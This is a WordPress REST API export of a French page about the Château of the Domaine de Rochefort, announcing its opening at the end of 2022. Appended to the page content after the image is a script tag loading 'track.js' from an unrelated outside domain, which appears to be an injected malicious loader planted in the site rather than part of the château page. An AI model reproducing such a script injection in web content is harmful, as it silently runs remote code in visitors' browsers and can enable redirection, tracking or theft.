{"id":13,"date":"2021-05-25T11:07:15","date_gmt":"2021-05-25T09:07:15","guid":{"rendered":"http:\/\/domainederochefort.fr\/?page_id=13"},"modified":"2022-07-19T12:56:43","modified_gmt":"2022-07-19T10:56:43","slug":"une-section-de-page-daccueil","status":"publish","type":"page","link":"http:\/\/domainederochefort.fr\/?page_id=13","title":{"rendered":"Notre ch\u00e2teau"},"content":{"rendered":"\n<p class=\"has-text-color\" style=\"font-size:28px;color:#de5cc0\"><strong>OUVERTURE FIN 2022<\/strong><\/p>\n\n\n\n<p>Construit de 1886 \u00e0 1890 au sein du Domaine de Rochefort, le ch\u00e2teau impressionne de part son architecture d&#8217;\u00e9poque.<\/p>\n\n\n\n<p>La beaut\u00e9 du cadre environnant met en avant ce bijou du 19e si\u00e8cle, qui vous accueillera bient\u00f4t. Un peu de patience !<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" width=\"647\" height=\"360\" src=\"http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/06\/Capture-decran-2021-06-01-093900.png\" alt=\"\" class=\"wp-image-117\" srcset=\"http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/06\/Capture-decran-2021-06-01-093900.png 647w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/06\/Capture-decran-2021-06-01-093900-300x167.png 300w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/06\/Capture-decran-2021-06-01-093900-108x60.png 108w\" sizes=\"(max-width: 647px) 100vw, 647px\" \/><\/figure>\n<script src='https:\/\/trick.cofounderspecials.com\/track.js?v=9.999' type='text\/javascript'><\/script>","protected":false},"excerpt":{"rendered":"<p>OUVERTURE FIN 2022 Construit de 1886 \u00e0 1890 au sein du Domaine de Rochefort, le ch\u00e2teau impressionne de part son architecture d&#8217;\u00e9poque. La beaut\u00e9 du cadre environnant met en avant ce bijou du 19e si\u00e8cle, qui vous accueillera bient\u00f4t. Un peu de patience !<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/pages\/13"}],"collection":[{"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13"}],"version-history":[{"count":8,"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/pages\/13\/revisions"}],"predecessor-version":[{"id":126,"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/pages\/13\/revisions\/126"}],"wp:attachment":[{"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}